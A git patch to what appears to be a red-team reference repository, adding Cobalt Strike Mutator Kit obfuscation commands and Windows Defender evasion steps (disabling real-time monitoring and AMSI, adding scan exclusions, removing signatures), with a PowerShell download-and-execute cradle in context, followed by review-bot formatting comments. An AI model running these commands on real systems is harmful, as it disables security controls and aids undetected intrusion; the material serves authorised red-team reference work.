From 59791e0c9f7c6ca473a0f1e53325d05ffe7f524b Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Fri, 9 Feb 2024 15:03:09 +0100 Subject: [PATCH] Windows Defender Antivirus - DefenderCheck --- docs/active-directory/ad-adds-enumerate.md | 1 + docs/command-control/cobalt-strike.md | 19 ++++++++ docs/redteam/evasion/windows-defenses.md | 52 ++++++++++++++-------- 3 files changed, 54 insertions(+), 18 deletions(-) diff --git a/docs/active-directory/ad-adds-enumerate.md b/docs/active-directory/ad-adds-enumerate.md index 757aedc..f69c6f5 100644 --- a/docs/active-directory/ad-adds-enumerate.md +++ b/docs/active-directory/ad-adds-enumerate.md @@ -9,6 +9,7 @@ Use the correct collector: * [FalconForceTeam/SOAPHound](https://github.com/FalconForceTeam/SOAPHound) for local Active Directory (C# collector using ADWS) * [NH-RED-TEAM/RustHound](https://github.com/NH-RED-TEAM/RustHound) for local Active Directory (Rust collector) * [fox-it/BloodHound.py](https://github.com/fox-it/BloodHound.py) for local Active Directory (Python collector) +* [coffeegist/bofhound](https://github.com/coffeegist/bofhound) for local Active Directory (Generate BloodHound compatible JSON from logs written by ldapsearch BOF, pyldapsearch and Brute Ratel's LDAP Sentinel) **Examples**: diff --git a/docs/command-control/cobalt-strike.md b/docs/command-control/cobalt-strike.md index e84435c..6c5aad8 100644 --- a/docs/command-control/cobalt-strike.md +++ b/docs/command-control/cobalt-strike.md @@ -13,6 +13,7 @@ $ ./cobaltstrike $ powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://campaigns.example.com/download/dnsback'))" ``` + ## Summary * [Infrastructure](#infrastructure) 
@@ -39,6 +40,7 @@ $ powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstri * [Artifact Kit](#artifact-kit) * [Mimikatz Kit](#mimikatz-kit) * [Sleep Mask Kit](#sleep-mask-kit) + * [Mutator Kit](#mutator-kit) * [Thread Stack Spoofer](#thread-stack-spoofer) * [Beacon Object Files](#beacon-object-files) * [NTLM Relaying via Cobalt Strike](#ntlm-relaying-via-cobalt-strike) 
@@ -423,24 +425,40 @@ Artifact Kit (Cobalt Strike 4.0) - https://www.youtube.com/watch?v=6mC21kviwG4 : - Build the Artifact - Cobalt Strike -> Script Manager > Load .cna + ### Mimikatz Kit * Download and extract the .tgz from the Arsenal (Note: The version uses the Mimikatz release version naming (i.e., 2.2.0.20210724) * Load the mimikatz.cna aggressor script * Use mimikatz functions as normal + ### Sleep Mask Kit > The Sleep Mask Kit is the source code for the sleep mask function that is executed to obfuscate Beacon, in memory, prior to sleeping. Use the included `build.sh` or `build.bat` script to build the Sleep Mask Kit on Kali Linux or Microsoft Windows. The script builds the sleep mask object file for the three types of Beacons (default, SMB, and TCP) on both x86 and x64 architectures in the sleepmask directory. The default type supports HTTP, HTTPS, and DNS Beacons. + +### Mutator Kit + +> The Mutator Kit, introduced by Cobalt Strike, is a tool designed to create uniquely mutated versions of a "sleep mask" used in payloads to evade detection by static signatures. It utilizes LLVM obfuscation techniques to alter the sleep mask, making it difficult for memory scanning tools to identify the mask based on predefined patterns, thereby enhancing operational security for red team activities. + +The OBFUSCATIONS variable can be `flattening`,`substitution`,`split-basic-blocks`,`bogus`. + +```ps1 +OBFUSCATIONS=substitution mutator.sh x64 -emit-llvm -S example.c -o example_with_substitutions.ll +mutator.sh x64 -c -DIMPL_CHKSTK_MS=1 -DMASK_TEXT_SECTION=1 -o sleepmask.x64.o src49/sleepmask.c +``` + + ### Thread Stack Spoofer > An advanced in-memory evasion technique that spoofs Thread Call Stack. This technique allows to bypass thread-based memory examination rules and better hide shellcodes while in-process memory. 
Thread Stack Spoofer is now enabled by default in the Artifact Kit, it is possible to disable it via the option `artifactkit_stack_spoof` in the config file `arsenal_kit.config`. + ## Beacon Object Files > A BOF is just a block of position-independent code that receives pointers to some Beacon internal APIs @@ -489,3 +507,4 @@ beacon> PortBender redirect 445 8445 * [NTLM Relaying via Cobalt Strike - July 29, 2021 - Rasta Mouse](https://rastamouse.me/ntlm-relaying-via-cobalt-strike/) * [Cobalt Strike - User Guide](https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/topics/welcome_main.htm) * [Cobalt Strike 4.6 - User Guide PDF](https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/cobalt-4-6-user-guide.pdf) +* [Introducing the Mutator Kit: Creating Object File Monstrosities with Sleep Mask and LLVM - @joehowwolf @HenriNurmi](https://www.cobaltstrike.com/blog/introducing-the-mutator-kit-creating-object-file-monstrosities-with-sleep-mask-and-llvm) \ No newline at end of file diff --git a/docs/redteam/evasion/windows-defenses.md b/docs/redteam/evasion/windows-defenses.md index 48667ea..736ea4d 100644 --- a/docs/redteam/evasion/windows-defenses.md +++ b/docs/redteam/evasion/windows-defenses.md 
@@ -321,29 +321,45 @@ Add-MpPreference -AttackSurfaceReductionRules_Ids -AttackSurfaceReductionRu Also known as `Microsoft Defender`. -```powershell -# check status of Defender -PS C:\> Get-MpComputerStatus +* Check status of Defender + ```powershell + PS C:\> Get-MpComputerStatus + ``` -# disable scanning all downloaded files and attachments, disable AMSI (reactive) -PS C:\> Set-MpPreference -DisableRealtimeMonitoring $true; Get-MpComputerStatus -PS C:\> Set-MpPreference -DisableIOAVProtection $true +* Disable scanning all downloaded files and attachments + ```powershell + PS C:\> Set-MpPreference -DisableRealtimeMonitoring $true; Get-MpComputerStatus + PS C:\> Set-MpPreference -DisableIOAVProtection $true + ``` -# disable AMSI (set to 0 to enable) -PS C:\> Set-MpPreference -DisableScriptScanning 1 +* Disable AMSI (set to 0 to enable) + ```powershell + PS C:\> Set-MpPreference -DisableScriptScanning 1 + ``` -# exclude a folder -PS C:\> Add-MpPreference -ExclusionPath "C:\Temp" -PS C:\> Add-MpPreference -ExclusionPath "C:\Windows\Tasks" -PS C:\> Set-MpPreference -ExclusionProcess "word.exe", "vmwp.exe" +* Exclude a folder, a process from scanning + ```powershell + PS C:\> Add-MpPreference -ExclusionPath "C:\Temp" + PS C:\> Add-MpPreference -ExclusionPath "C:\Windows\Tasks" + PS C:\> Set-MpPreference -ExclusionProcess "word.exe", "vmwp.exe" + ``` -# exclude using wmi -PS C:\> WMIC /Namespace:\\root\Microsoft\Windows\Defender class MSFT_MpPreference call Add ExclusionPath="C:\Users\Public\wmic" +* Exclude a folder using WMI + ```powershell + PS C:\> WMIC /Namespace:\\root\Microsoft\Windows\Defender class MSFT_MpPreference call Add ExclusionPath="C:\Users\Public\wmic" + ``` + +* Remove signatures. **NOTE**: if Internet connection is present, they will be downloaded again. 
+ ```powershell + PS > & "C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\MpCmdRun.exe" -RemoveDefinitions -All + PS > & "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All + ``` + +Identify the exact bytes that are detected by Windows Defender Antivirus + +* [matterpreter/DefenderCheck](https://github.com/matterpreter/DefenderCheck) - Identifies the bytes that Microsoft Defender flags on +* [gatariee/gocheck](https://github.com/gatariee/gocheck) - DefenderCheck but blazingly fastâ„¢ -# remove signatures (if Internet connection is present, they will be downloaded again): -PS > & "C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\MpCmdRun.exe" -RemoveDefinitions -All -PS > & "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All -``` ## Windows Defender Application Control
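Review bot: in the `ad-adds-enumerate.md` hunk, the new bofhound bullet is listed under "Use the correct collector:" but the tool, per its own parenthetical, converts logs from other collectors (ldapsearch BOF, pyldapsearch, Brute Ratel's LDAP Sentinel) into BloodHound JSON rather than collecting anything itself; say so explicitly and keep the parenthetical short like the sibling entries, e.g. `for local Active Directory (offline converter: builds BloodHound-compatible JSON from ldapsearch BOF, pyldapsearch and Brute Ratel LDAP Sentinel logs)`.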
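Review bot: in the Mutator Kit hunk of `cobalt-strike.md`, the code fence is tagged `ps1` but both lines are POSIX shell syntax (the `OBFUSCATIONS=substitution mutator.sh ...` environment-variable prefix is not valid PowerShell, and the script is `mutator.sh`), so tag the fence `bash`. The sentence listing the OBFUSCATIONS values is missing spaces after the commas (`flattening`, `substitution`, `split-basic-blocks`, `bogus`), and since only the first command sets the variable, document what happens when it is unset, as in the second `sleepmask.c` build line, and whether several values can be combined.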
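Review bot: the reference hunk at the end of `cobalt-strike.md` leaves the file without a trailing newline (`\ No newline at end of file`); add one so the next append does not touch this line again. The new entry also drops the publication date that the first sibling entry carries (`NTLM Relaying via Cobalt Strike - July 29, 2021 - Rasta Mouse`); add it for consistency.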
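Review bot: in the `windows-defenses.md` hunk the bullet "Disable scanning all downloaded files and attachments" understates its first command, `Set-MpPreference -DisableRealtimeMonitoring $true`, which turns off real-time protection as a whole, not just download scanning; reword the bullet to name both effects. In the exclusion bullet, `Set-MpPreference -ExclusionProcess "word.exe", "vmwp.exe"` replaces the existing process exclusion list while the two `Add-MpPreference -ExclusionPath` lines append, so either switch to `Add-MpPreference -ExclusionProcess` or state that the list is overwritten. The gocheck entry contains mis-encoded text (`fastâ„¢`), which should be the single `™` character; check the file is saved as UTF-8. The `MpCmdRun.exe` path under `Platform\4.18.2008.9-0` is one specific platform build and changes with every update, so mark it as an example. Finally, the line "Identify the exact bytes that are detected by Windows Defender Antivirus" has no terminal punctuation and sits as a bare paragraph between bullet groups; format it like the surrounding `* ...` items or as a heading.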